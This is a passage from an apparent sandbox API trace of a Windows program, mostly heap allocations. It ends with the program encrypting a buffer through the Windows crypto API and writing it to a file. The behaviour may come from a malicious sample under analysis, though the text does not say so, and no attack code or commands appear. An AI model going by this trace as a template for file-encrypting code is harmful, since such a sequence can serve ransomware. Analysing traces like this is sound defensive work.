dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.998] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.999] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0093.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.000] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0094.000] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0094.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0094.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0094.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0094.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0094.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0094.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0094.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0094.005] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0094.006] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e2870, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2870*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.006] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.007] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x244f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x2450) returned 1 [0094.007] CharLowerBuffW (in: lpsz="byte[9297]", cchLength=0xa | out: lpsz="byte[9297]") returned 0xa [0094.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.007] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451cd18*, pdwDataLen=0x144e538*=0x244f, dwBufLen=0x2450 | out: pbData=0x451cd18*, pdwDataLen=0x144e538*=0x2450) returned 1 [0094.008] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.008] WriteFile (in: hFile=0x298, lpBuffer=0x4518468*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4518468*, lpNumberOfBytesWritten=0x144ef3c*=0x2450, lpOverlapped=0x0) returned 1 [0094.009] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca868, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0094.010] CryptDestroyKey (hKey=0x41ac280) returned 1 [0094.010] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.010] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0094.010] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0094.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.011] FreeLibrary (hLibModule=0x756e0000) returned 1 [0094.011] CloseHandle (hObject=0x258) returned 1 [0094.011] CloseHandle (hObject=0x298) 